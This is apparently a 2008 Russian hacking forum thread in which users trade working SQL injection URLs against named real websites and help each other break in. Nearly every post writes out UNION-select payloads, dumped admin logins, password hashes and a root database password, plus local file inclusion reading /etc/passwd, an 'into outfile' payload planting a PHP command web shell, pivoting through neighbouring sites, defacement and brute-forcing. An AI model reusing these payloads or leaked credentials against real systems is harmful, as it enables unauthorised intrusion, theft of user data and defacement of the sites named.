Buddah, твой пример - слепая инъекция. Слепая, потому что нет вывода. Что бы прочитать какие-то данные из базы используют подзапросы и побуквенно вытаскивают инфу. Почитай это:
1) http://dev.mysql.com/doc/
2) https://forum.antichat.ru/thread19605.html
3) https://forum.antichat.ru/thread35207.html
А по поводу того как лучше искать поле и всё прочее - поле должно иметь вывод на страницу, тебе же надо увидеть какие-то данные? :)
есть сайт http://site.com/index.php
на котором можно залогинится.
я посылаю следующий POST запрос
login=admin'+OR+1=1&password=qwerty
выдает следующую ошибку
[IBM][CLI Driver][DB2/LINUX] SQL0010N The string constant beginning with "'" does not have an ending string delimiter. SQLSTATE=42603 Attempted Query: select c.id,login,password,user_name,org_name,dt_of_birth ,rtrim(who_is) as WHO_IS,"plan",last_login,last_updated,ip_addr,street,city,count ry,zip,phone,icq,email,dish_size,expired,dealer,ma nager,status,c.transponder as transponder,card_type,os_type,c.kind,acl,p.pid as pid,bgp_as,bgp_peer,mac_addr,can_chng_plan,can_pay ,prize_percent,prize_id,mobile,rtrim(type_conn) as type_conn from clients as c left join plans as p on c."plan"=p.id where login='admin\\\' OR 1=1'
из ошибки видно что добавляются слеши и я думаю что изза них и не пропускает...
кто что может посоветовать ???
Buddah, твой пример - слепая инъекция. Слепая, потому что нет вывода. Что бы прочитать какие-то данные из базы используют подзапросы и побуквенно вытаскивают инфу. Почитай это:
1) http://dev.mysql.com/doc/
2) https://forum.antichat.ru/thread19605.html
3) https://forum.antichat.ru/thread35207.html
А по поводу того как лучше искать поле и всё прочее - поле должно иметь вывод на страницу, тебе же надо увидеть какие-то данные? :)
спасибо пошел читать
выдает следующую ошибку
[IBM][CLI Driver][DB2/LINUX] SQL0010N The string constant beginning with "'" does not have an ending string delimiter. SQLSTATE=42603 Attempted Query: select c.id,login,password,user_name,org_name,dt_of_birth ,rtrim(who_is) as WHO_IS,"plan",last_login,last_updated,ip_addr,street,city,count ry,zip,phone,icq,email,dish_size,expired,dealer,ma nager,status,c.transponder as transponder,card_type,os_type,c.kind,acl,p.pid as pid,bgp_as,bgp_peer,mac_addr,can_chng_plan,can_pay ,prize_percent,prize_id,mobile,rtrim(type_conn) as type_conn from clients as c left join plans as p on c."plan"=p.id where login='admin\\\' OR 1=1'
из ошибки видно что добавляются слеши и я думаю что изза них и не пропускает...
кто что может посоветовать ???
Скорее всего ты здесь ничего не сделаешь, т.к. судя по всему мейджик_квотс = он:
Думаю что вначале кавычка экранировалась слешем (который ставился квотой), а затем сам скрипт экранировал повторно и кавычку и слеш (поставленный квотой), т.е. скорее всего даже если мейджик_квотс был равен = офф, ты бы здесь ничего не сделал.
А вообще в таких случая нужно приписывать перед кавычкой слеш (в надежде что мейджик_квотс = офф и что скриптом слеш не будет экранирован), тогда получится что один слеш экранирует другой, а кавычка останется не экранированной ( \\' ).
привет.
ребята, помогите мне пожалуйста вот с етим:
http://alvis.ru/company_news/index.php3?id=-1+union+select+1,2,3,concat_ws(char(58),pwd,login, email),5,6,7,8,9,10,11,12,13,14+from+users/*
а дальше че-т не идет..
через SICT перебрал таблици, вроде есть admin, но доступа у меня к ней нету =(
привет.
ребята, помогите мне пожалуйста вот с етим:
http://alvis.ru/company_news/index.php3?id=-1+union+select+1,2,3,concat_ws(char(58),pwd,login, email),5,6,7,8,9,10,11,12,13,14+from+users/*
а дальше че-т не идет..
что не идет ?
через SICT перебрал таблици, вроде есть admin, но доступа у меня к ней нету =(
абсолютно верно..
SELECT command denied to user 'alvis'@'localhost' for table 'admin'
ну на запрос к администраторской панели:
http://alvis.ru/admin
просит ввести имя и пароль..
если виполнить предодущий запрос (которий я написал), то ми увидем:
shb09789:www:webmaster@alvis.ru
если вводить ети дание, то админ_панель отказиваетса показиватса =)
Jokester
06.08.2008, 23:10
абсолютно верно..
Не совсем.
Не факт, что таблица есть, натпись "command denied" вылезает так-же при неверном значении таблицы.
http://alvis.ru/company_news/index.php3?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14+from+abracadabra/*
Ну или там есть таблица "abracadabra", и к ней тоже закрыт доступ :D
если вводить ети дание, то админ_панель отказиваетса показиватса =)
А кто сказал что они должны подойти? :)
я посто программой SICT перебирал названия таблиц, и поля, и прога мне сказала что таблица admin сущечтвует =) (а может бить и abracadabra сучествует =))
shb09789:www:webmaster@alvis.ru
лааадно, тогда если ети данние вводить там где пользовател авторизуетса, они тоже не подхолят =Р
если нам виводитса мило, логин и пароль, то должи же они кудо-то подходить =)
Jokester
06.08.2008, 23:20
прога мне сказала что таблица admin сущечтвует
Я и не говорю , что нет, я говорю "не факт"
если нам виводитса мило, логин и пароль, то должи же они кудо-то подходить =)Логично, но они могут быть от чего угодно, ищи ещё какие-то формы входа
И версия sabe в посте ниже , тоже может быть верной
jokester
ну да.. понятно... я по словам спрашиваещего судил..)
eLWAux
не обезательно должны подходить..... может быть просто наеб или старая таблица.. так как она имеет уж очень стандартное название.. и я думаю ты не первый этот сайт взламываеш.. )
и еще приведенная тобой админка
http://alvis.ru/admin
использует basic auth. нарвеника пассы лежат в этой же дикертории )
ок!
тогда что получаетса:
таблица admin, допустим, существует, и в ней, наверное, админ_пароли и админ_логини..
НО, доступу к ней у нас нету =(
а в таблице users, которая нам доступна, ми получаем имени, пароли, мило (кстати, их всего 4штука), но они никуда не подходят =(
что же, сайт уязвимий, но получит админ нереально?
eLWAux
не факт что эта таблица пренадлежит базе этого сайта )
да.. думаю глухая тема..
прости, sabe, но я знаю что сайт возможно hack на 100%
передо мною его уже hackали
да не все ок.) это токо мое мнение....... все возможно )
to eLWAux
Мой тебе совет не вцепляйся в одну sql инъекцию, вполне возможно что доступ к админке ограничен с помощью .htaccess и .htpasswd, т.е. пароль на админку лежит в файле, а не в БД.
Что тут можно сделать?
Мне кажется Реверс айпи тут может принести пользу и не малую, сам глянь - сайтов там хостится не много, вполне возможно что хост кривой и имя шелл на соседнем сайте ты даже без рута сможешь смотреть содержимое нужного тебе сайта (в своей практике я довольно часто такое встречаю).
Также вполне возможно что какой нидь из соседних сайтов крутится под root-овским пользователем БД, так что копай соседние сайты (да и этот проверь хорошнько - вдруг найдешь инклуд или читалку файов, а они могут сильно помочь).
to Grey:
понимаеш, я только начинаю свой путь хакера =)
,и сейчас у меня период SQL инекций =)
вот я и должен ЕТУ инекцию добить =)
имменно из этой скули ты врятле чтот достаниш..... Grey правду говорит.. очень приятно когда залив шелл на один сайт.. получаеш доступ еще к десятке..))
хорошо =)
..p.s.: тогда где об етом можна прочитать?
идеш сюда...... http://wservices.ru/reverseip.php
смотриш все сайты на сервере...
потом ищеш способ залить шелл на одном из них.. то ли методом sql/php иньекции..... то ли другими возможностями...
Red_Red1
07.08.2008, 02:20
2 eLWAux по поводу сайта alvis.ru
Нашел возможность зайти под любым зареганым юзером, для этого в поле пароль пишем такое 1' or 1=1 limit Х,1/*
где Х перебираем от 0 до количества зареганых юзеров.
Также есть таблица clients но из нее нифига не выводит (может у меня руки не от туда). Имхо в этой табличке и хранятся данные юзеров, но вот как добыть их хз
Red_Red1
нам нужен админ ))))
ммм, да 1' or 1=1 limit Х,1/* работает =) ето уже хорошо..
доступ к любому пользователю у нас тепер есть!
ето уже хорошо..
остался доступ к админке =)
вот в таком представление хранятся пароли в таблице:
'xIAЖИO®Ык§\0ЛMуЎШЄЦ°`Ж',
'СЛi›Ъј9Qb п7є.',
как их правильно отобразить?
Jokester
07.08.2008, 13:11
вот в таком представление хранятся пароли в таблице:
'xIAЖИO®Ык§\0ЛMуЎШЄЦ°`Ж',
'СЛi›Ъј9Qb п7є.',
как их правильно отобразить?
Если convert или UNHEX/HEX не прокатывает , то скорее всего пароли закриптованы aes_encrypt ,с ключом который ты не знаешь, или самописной кодировкой, тоесть врятли ты их увидишь
ребята, кароце я все понял про alvis.ru:
админ иногда вирубивает доступ к alvis.ru/admin
и поетому иногда не получаетса туда попасть..
а вот и сам админ:
pwd = shb09789
login = www
mail = webmaster@alvis.ru
проблему с сайтом решено !!
СПАСИБО всем кто мне дал помощ =)
и ето опять я =)
вот ещо один сайт kino.ru
вроде SQL есть..
http://kino.ru/cinema.php?id=152' но при етом ошибка не появляетса
http://kino.ru/cinema.php?id=152+AND+1=1/* все ок!
http://kino.ru/cinema.php?id=152+AND+1=2/* пусто!
я думаю ето SQL инекция =)
но, я уже и substring и union select 1,...../* пробовал,
но при етих запросах никак немогу понят, ответ GOOD или нет=)
По-моему, ты ошибся. При всех запросах выводится одно и то же. Поищи скулю в "поиске" =)
111' union select 1,2,3,4,5 from email limit 950,1/*
Собствено такой вопрос Sql выдает пароль, и логин но в админку незаходит.
вот пример:
http://www.ssw-pruefsysteme.de/i_shop/shopdisplayproducts.asp?cat='%20union%20select%201 ,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37%20from%20tbluser"having%201=%201--sp_password
А вот сама админка:
http://www.ssw-pruefsysteme.de/i_shop/ssw_shopadmin35.asp
Собствено что можно зделать?
Возможно стоит блок по ай-пи. То есть в админку может заходить только с ай-пи 75.125.150.120 - к примеру.
xWhitex: ну или (так как у меня с alvis.ru било) просто вход в админку иногда вирубивають =(
Собствено что можно зделать?
Эмм, ну вобщето ты получил пасс от самой базы данных, а не пасс от админки ;)
Здрастье =)
у меня вопрос:
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,7,8,9/*
Вот скуля,принтабельное поле - 7
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,version(),8,9/*
http://s56.radikal.ru/i151/0808/4c/cd44db41a1a4.jpg (http://www.radikal.ru)
J\Очень интересно выводиться версия,можно ли вывести данные кроме version()???
Заранее спасибо
Здрастье =)
у меня вопрос:
+select+1,2,3,4,5,6,7,8,9/*
Вот скуля,принтабельное поле - 7
http://s56.radikal.ru/i151/0808/4c/cd44db41a1a4.jpg (http://www.radikal.ru)
J\Очень интересно выводиться версия,можно ли вывести данные кроме version()???
Заранее спасибо
скорее всего нет,я думаю,там стоит ограничение по типу данных и по длине...
а у меня такой вопрос:
почему не проходит конструкция ?
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,0x3c3f207379 7374656d28245f4745545b27636d64275d293b203f3e,3,4,5 +from+main_data2.admin+into+outfile+0x2f7661722f77 77772f666f72756d2f7368656c6c2e706870/*
0x3c3f2073797374656d28245f4745545b27636d64275d293b 203f3e - <? system($_GET['cmd']); ?>
0x2f7661722f7777772f666f72756d2f7368656c6c2e706870 - установочная дирректория /var/www/forum/shell.php
В Into Outfile нельзя использовать Hex значения, только коквычки
Гы гы, connect.php
<?
$Host = "localhost";
$User = "root";
$Password = "123456";
$Database_name = "forum";
$Link = mysql_connect ($Host, $User, $Password) or die(mysql_error());
mysql_select_db($Database_name,$Link) or die(mysql_error());
?>
Мощный пароль на рута :D
K1nD[e]R
09.08.2008, 03:57
http://www.pixheaven.net/galerie.php?id=-5+union+select+1,2,3,4,5,6,version(),8,9+from+mysq l.users/*
повидимому вслепую видно что ето версия 4.1.x
да и SELECT command denied to user 'pixheavennet'@'10.0.85.212' for table 'usersнет доступа на чтение..
R']http://www.pixheaven.net/galerie.php?id=-5+union+select+1,2,3,4,5,6,version(),8,9+from+mysq l.users/*
повидимому вслепую видно что ето версия 4.1.x
да и SELECT command denied to user 'pixheavennet'@'10.0.85.212' for table 'usersнет доступа на чтение..
Почему же четвертая? Если выводиться,что пятая?
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,7,8,9/*
Увидишь,что принтабельно поле 7,а когда вводишь version() ,то активируется\загарается цифра ПЯДЬ :eek:
superboys
09.08.2008, 10:46
кто поможет
http://evo.nightspirits.net/indexframe.php?razdel=registration'
вот нашёл такую дыру кто скажет можно её дальше раскроить?
кто поможет
вот нашёл такую дыру кто скажет можно её дальше раскроить?
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/*
Кстати там ещё таблица users есть.
K1nD[e]R
09.08.2008, 22:01
Почему же четвертая? Если выводиться,что пятая?
Увидишь,что принтабельно поле 7,а когда вводишь version() ,то активируется\загарается цифра ПЯДЬ :eek:
а ты введи вместо (7) цифру 3 и увидиш загоритсо цифра 3...
Jokester
09.08.2008, 22:33
K1nD[e]R,DDoSька
Версия 5 полей с выводом нет(в этом месте), цифра которая выводится(активируется) это не вывод, но её можно использовать как индикацию true
Тоесть:
http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=3
цифра не активна false
http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=4
цифра не активна false
http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=5
цифра зажглась true
Или ищи вывод в другом месте, или подзапросы
Вот мой не похек (((( помогите пожалуйстА!
http://football.kapook.com/webboard_view_guest.php?qid='4595
http://mrdriver.com/device.php?id=33714'
http://driversdb.com/device.php?id=107971'
2 последних..вообще как одинаковые...
K1nD[e]R, mysql.userS не существует. Есть mysql.user
DDoSька
http://football.kapook.com/team.php?id=13%27+union+select+1,2,3,4,5,6,7,conca t(0x3a,user,0x3a,password),9,10,11,12,13,14,15,16, 17,18,19,20+from+mysql.user/*
:root:612382396d951d43
http://mrdriver.com/device.php?id=-33714%27+union+select+version()/*
5.0.24-standard
Не будем перебирать все таблицы и посмотрим на сайт.
Стоит форум mybb пробуем табл mybb_users
http://mrdriver.com/device.php?id=-33714%27+union+select+concat(uid,0x3a,loginkey,0x3 a,password,0x3a,email,0x3a,icq)+from+mybb_users+li mit+0,1/*
1:sekysvwGmEE5uCfSHMKdK1uAUdrykTa6XkwLbNSnsxli1Q2D 7h:24a1de6ebae6c9497fac8e1c328d8fa2:webmaster@mrdr iver.com:
Всё зашифровал))) гад.
http://driversdb.com/device.php?id=-107971%27+union+select+concat(uid,0x3a,loginkey,0x 3a,password,0x3a,email,0x3a,icq)+from+mybb_users+l imit+0,1/*
1:7T6Jlse4WHMFWtJax9OsOVgLqmWoufnlzPDkCtHGFleS9YZm W4:e7cf5c7cf184622332e2bc347a38659a:forum@driversd b.com:
superboys
10.08.2008, 11:55
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/*
Кстати там ещё таблица users есть.
можно попонятнее разъяснить где что я нуп))
можно попонятнее разъяснить где что я нуп))
https://forum.antichat.ru/threadnav43966-1-10.html
superboys
10.08.2008, 14:15
Да уже всё репку накинул))
S0ulVortex
10.08.2008, 14:50
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5, 6,7,8,9,0/*
Помогите новичку дальше незнаю что делать :)
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5, 6,7,8,9,0/*
Помогите новичку дальше незнаю что делать :)
_http://www.safelider.ru/view.php?item=-2877+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,log in,password),9,0+from+users/*
Table [banners] Table [catalog] Table [catalog_picture] Table [catalog_struct] Table [catalog_text] Table [db_pics] Table [feature_bind] Table [feature_group] Table [feature_type] Table [fotobank] Table [invoice] Table [link_catalog] Table [manufactures] Table [news] Table [pages] Table [pricelist] Table [tovar] Table [users]
S0ulVortex
10.08.2008, 16:23
_http://www.safelider.ru/view.php?item=-2877+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,log in,password),9,0+from+users/*
Table [banners] Table [catalog] Table [catalog_picture] Table [catalog_struct] Table [catalog_text] Table [db_pics] Table [feature_bind] Table [feature_group] Table [feature_type] Table [fotobank] Table [invoice] Table [link_catalog] Table [manufactures] Table [news] Table [pages] Table [pricelist] Table [tovar] Table [users]
Спс биг а как мне терь найти папку с бд
?item=-1+union+select+1,2,concat_ws(char(58),user(),datab ase(),version()),4,5,6,7,8,9,0/*
user: u13238@10.10.223.207
database: u13238_2
version: 5.0.45-log
подбирай таблици..
superboys
10.08.2008, 17:33
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/* а можно отсюдова файлы посмотреть?
~!DoK_tOR!~
10.08.2008, 18:03
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/* а можно отсюдова файлы посмотреть?
нет
superboys
10.08.2008, 22:40
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/* а как не локальный сервер получить майсикьюла пробывал некоторые значения не прокатило*?
Don Anton
10.08.2008, 22:46
должно пройти, не может быть
superboys
10.08.2008, 22:54
Вот он мне выдаёт
4
версия 4.1.9|используемая база db2255b| на запрос пасса 606717756665bce6|юзер us2255a@localhost
6, Хитрый Чен=))
Ситуация: Откопал кем-то залитый ремвью на кажись польский сайт. получил доступ к базе. Прав на запись нету. Есть логин\пасс админа, правда чет не заходит :) может не туда ввожу, сайт-то польский.
Что можно сделать кроме как удалить\перезалить базу? :)
~!DoK_tOR!~
11.08.2008, 01:08
Что можно сделать кроме как удалить\перезалить базу?
что душе угодно )
Ну тогда помоги, пожалуйста, задефейсить :) Или хоть направь куда копать. Поиск не помог.
~!DoK_tOR!~
11.08.2008, 03:19
редактируй index.php
при запросе id=2'
получаю сообщение
DBI debuging message / Отладочное сообщение DBI
Error / Ошибка Could not Parse Query
Query / Запрос select id,one,name from pb_portal where id=2\'
Description / Описание You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
там как я понял фильтрация какаято, хелп
http://www.paintball.ru/next.php?id=2'
скажите как называется таблица с "солью" в новых версиях и где она лежит? и подскажите плиз какого вида функция шифровки пароля в ИПБ-формух?
И ещё подскажите. Вот ситуация:
Есть локальный инклуд. логов не нашёл. На поддомене есть форум. адресв вида:
forum.site.ru
и есть возможность туда загружать файлы. Но вот проблема: я не знаю как прописать путь до форума! Если ИП адрес их отличается - это значит что они на разных компах? (205.222.222.123 и 205.222.222.124)
site.ru/forum/ не катит =(
site.ru/ins.php?inc=../../../etc/passwd%00
кто что думает по данному поводу?
aka PSIH
11.08.2008, 08:02
скажите как называется таблица с "солью" в новых версиях и где она лежит? и подскажите плиз какого вида функция шифровки пароля в ИПБ-формух?
SQL Databases (http://up.cih.ms/ettee/sql/)
логов не нашёл.
пробуй httpd.conf (https://forum.antichat.ru/thread49775.html) поискать...
не знаю как прописать путь до форума!
https://forum.antichat.ru/showthread.php?t=30632
сли ИП адрес их отличается - это значит что они на разных компах? (205.222.222.123 и 205.222.222.124)
не обязательно... ;)
что тут можно зделать ?
http://interfilm.ru/takelogin.php?returnto=&username=admin&password=9999999+union+select+1
и вот тут
http://www.photodom.com/ru/catalog.php?page=0&id=9999999)+union+select+1,2,3,4,5,6,7,9,10/*
а также здесь знаю что юнион использовать нельзя.. но все же..
http://www.aldebaran.ru/gb/index.php?entry=25+union+all+select+1/*
netframework - хз как разкрутить..
http://zman.com/news/category.aspx?CategoryId=20'
SVAROG
http://www.paintball.ru/next.php?id=99999+union+select+1,2,table_name+from +information_schema.tables+limit+17,1--
баян..
superboys
11.08.2008, 10:36
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),database(),password(0),user()))),6, 7,8,9/* кто знает как тут нарыть удалённый адрес для БД
Jokester
11.08.2008, 10:58
2 sabe
http://interfilm.ru/takelogin.php
Пишет что нет коннекта с базой, что ты хочешь от него
Сдесь пятая ветка без вывода,подзапросы:
http://www.photodom.com/ru/catalog.php?page=0&id=9)+and+substring(version(),1,1)=5/*
Сдесь лимит после ордер влиять на запрос можно только подставляя 2-е значение лимита:
http://www.aldebaran.ru/gb/index.php?entry=25,1/*
тоесть никак
это ошибка введённых данных использовать можно только расскрытие пути
http://zman.com/news/category.aspx?CategoryId=20
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),database(),password(0),user()))),6, 7,8,9/* кто знает как тут нарыть удалённый адрес для БД
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*
superboys
11.08.2008, 12:34
сёравно @localhost
XSS-base64
_http://securityvulns.ru/news/CGI/2008.06.14.html
_http://securityvulns.ru/news/CGI/2008.06.19.html
Exploit: http://localhost/vB3/admincp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
Помогите разобраться как использовать данную XSS заранее спс.
MaSTeR GэN
11.08.2008, 20:52
2TehRn собственно ф чем проблема то ?
"PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" Это не что иное как закодированный base64 "<script>alert('XSS')</script>" ;) собтвенно кодируй то что нужно в base и вставляй это пассивная xss на форуме оч многа написанно по этой теме читай ;)
Подобрал количество полей. всё гуд, ошибки нету, но и ничего не выводит. где трабл?
http://test.livani.lv/lat/aktualitates/aktualitates/?doc=55555551661+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14/*
MaSTeR GэN
11.08.2008, 21:07
2mr.The если мне зрение не изменяет тама нету полей для вывода один выход слепая иньекция ;)
2MaSTeR GэN
и на том спасибо. а я думал туплю где-т
подцепил локальным инклудом файлы
/etc/passwd
etc/httpd/conf/httpd.conf
нашёл файл
phpinfo.php
из httpd.conf видно, что на хостинге есть ещё сайты. такая запись:
<VirtualHost *:80>
ServerAdmin mail@gmail.com
DocumentRoot /home/SITENAME/public_html
ServerName www.SITENAME.com
ServerAlias SITENAME.com
ErrorLog /dev/null
CustomLog /dev/null common
SetOutputFilter DEFLATE
DeflateFilterNote ratio
SetEnvIfNoCase Request_URI \.(?:gif|jpe?g|png)$ no-gzip dont-vary
SetEnvIfNoCase Request_URI \.(?:exe|t?gz|zip|bz2|sit|rar)$ no-gzip dont-vary
SetEnvIfNoCase Request_URI \.pdf$ no-gzip dont-vary
ExpiresActive On
<Directory /home/SITENAME/public_html>
AllowOverride All
ExpiresByType application/x-shockwave-flash A0
ExpiresByType text/javascript A2419200
ExpiresByType text/plain A2419200
ExpiresByType text/html A300
ExpiresByType text/css A2419200
ExpiresByType image/gif A2419200
ExpiresByType image/jpeg A2419200
ExpiresByType image/png A2419200
</Directory>
</VirtualHost>
но приинклудить из них ничего не получается. видимо, такие настройки.
логов не нашёл =/
Загружать никаких файлов туда нельзя.
что мне можно сделать, чтобы хакнуть этот сайт?
По поводу /etc/passwd, знаю что брутят по маске Логин:Логин фтп, ссх. Скажите пожалуйста, какими брутфорсами это можно провернуть, кроме Гидры, не дружу с ней.
~!DoK_tOR!~
12.08.2008, 00:07
ServerName www.SITENAME.com )
но приинклудить из них ничего не получается. видимо, такие настройки.
такого сайта нет вот и не получается проинклудить SITENAME.com )
нет нет. Это я изменил имя, дабы не светить сервер
superboys
12.08.2008, 00:58
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),database(),password(0),user()))),6, 7,8,9/* кто знает как тут нарыть удалённый адрес для БД + можно там файлы посмотреть через иньекцию
Не знал куда написать. Решил сюда.
Проблема с заливкой шелла. Шелл на holm.ru, но там есть пхп, поэтому он исполняется, а некопируется... Пробовал в .htaccess прописать AddType application/force-open .php - не помогло, как видите... на холме открывается загрузка файла, на сайте с инклюдом - каракули... Подскажите что путевое в htaccess прописать чтоб пахало :)
help:
http://www.world-art.ru/games/games.php?id=4575+or+1=1
есть иньекция ?
http://www.litprom.ru/text.phtml?storycode=1'
Calcutta
12.08.2008, 08:11
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359'
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+order+by+5--
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+union+select+1,2,3,4,5--
инъекция есть, но с раскруткой проблемы. подскажет кто?
http://www.world-art.ru/games/games.php?id=4575+or+1=1
инъекта нет
http://www.litprom.ru/text.phtml?storycode=1'
блинд скул
http://www.litprom.ru/text.phtml?storycode=-9999999991+union+select+1,2/*
http://www.litprom.ru/text.phtml?storycode=-9999999991+union+select+1/*
инъект есть, вывода нет
читай Blind Sql Inj
help:
есть иньекция ?
http://www.world-art.ru/games/games.php?id=4575+or+1=1
Я не уверен, но разве в SQL инъекции когда подбирают кол-во полей , ставят or 1=1?
Glazz
это определение.. )
base
наверно ты прав.. )
http://kinomob.info/system/thumb.php?img_id=1+union+select+version()--
http://kinomob.info/index.php?p=showforum&fid=1+union+select+1--
логический вывод - 5 версия, как получить вывод ?
Шелл на holm.ru, но там есть пхп, поэтому он исполняется, а некопируется...
А не проще на народе какой-нить аккаунт, специально для шеллов и подобного создать?
http://www.world-art.ru/games/games.php?id=4575+or+1=1
инъекции НЕТ!
есть:
http://www.litprom.ru/text.phtml?storycode=1'
но слепая: http://www.litprom.ru/text.phtml?storycode=20+union+select+1
логическая ошибка
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
проходит фильтрацию. если число больше или меньше допустимого - выводится страница с ошибкой. Если нормальное (именно первое число, без остального запроса), то отправляется к БД, но уже с остальным запросом
superboys
12.08.2008, 12:01
я дето слышал что через иньекцию мона посмотреть какие папки на сервере мона такое очуществить и как?
superboys
12.08.2008, 12:23
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/* кто поможет выудить пасс к мусклу если чо вот удалённый доступ к мусклу http://81.177.9.37:911/administration/mysql/index.php
superboys, прав не хватит на чтение mysql.user
superboys
12.08.2008, 12:27
это в каком сообщение 1 или 2?)
Ко второму.
К первому нужны права на чтение файлов.
superboys
12.08.2008, 12:35
ппц, а чо ещё можно сделать? Кроме как ддосить, крашить и т.д.
Оставь как есть или напиши администратору о дырке.
ппц, а чо ещё можно сделать? Кроме как ддосить, крашить и т.д.
можно узнать пароль админа на форуме
потом через форум можно залить шелл .. и будет тебе счастье :)
попробуй такие идеи
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*
это для технической информации
также можешь узнать пароль и имена пользователей
таблица
phpbb_users
поля
username
user_password
может кто показать , как заливают фаил через load_file() в скл инъекции .
Red_Red1
12.08.2008, 13:56
Вот отличная статья, там все написано https://forum.antichat.ru/showthread.php?t=19605
Смотри пункт
4)Получить шелл
Ах да, файл НЕ заливают через LOAD_FILE() его читают. А заливают через into+outfile+'/ПУТЬ/ИМЯ_ФАЙЛА'
Вот отличная статья, там все написано https://forum.antichat.ru/showthread.php?t=19605
Смотри пункт
4)Получить шелл
Ах да, файл НЕ заливают через LOAD_FILE() его читают. А заливают через into+outfile+'/ПУТЬ/ИМЯ_ФАЙЛА'
спасибо , почитаю.
А ИМЯ_ФАЙЛА(путь) на моем компе , или на его? и заливается , то куда?
http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name ),7,8,9,10,11,12,13,14,15,16,17+from+information_s chema.tables+limit+0,1/**
а дальше?
тут 4 версия мы можем только подобрать таблицы. information_schema.tables есть только в 5 версии и выше
superboys
12.08.2008, 15:18
можно узнать пароль админа на форуме
потом через форум можно залить шелл .. и будет тебе счастье :)
попробуй такие идеи
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*
это для технической информации
также можешь узнать пароль и имена пользователей
таблица
phpbb_users
поля
username
user_password
по твоей подсказке сделал такой запрос http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+select+1,2,3,4,username,user _password,7,8,9+from+phpbb_users/* но почемут не видно данных базы.
superboys
12.08.2008, 15:30
скорей сего шифрование _ пробывал с декриптом ваще ошибка(
по твоей подсказке сделал такой запрос http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+select+1,2,3,4,username,user _password,7,8,9+from+phpbb_users/* но почемут не видно данных базы.
hex, aes_encrypt
Red_Red1
12.08.2008, 15:38
Юзай лимит Х,Х
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+select+1,2,3,4,username,user _password,7,8,9+from+phpbb_users+limit+1,1/*
superboys
12.08.2008, 15:39
да хоть бы показал синтаксис)
superboys
12.08.2008, 15:40
спс Ред_Ред1
да хоть бы показал синтаксис)
а маны кто будет читать ?
superboys
12.08.2008, 16:01
в манах такого нет) Да ужо всё наашёл хэш Lupo:b7dba5a1bc3605a87b59ac8147512c97
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=999999999'+union+select+1,2,3,concat_ws(0x3a, username,user_password),5,6,7,8,9+from+phpbb_users +where+user_level=1+limit+0,1/*
piton;526635
дай форум залью шелл )
Посмотрите если инклуд
http://admzven.ru/cgi-bin/document.pl?action=showFullDoc&p=1'
0nep@t0p
12.08.2008, 23:05
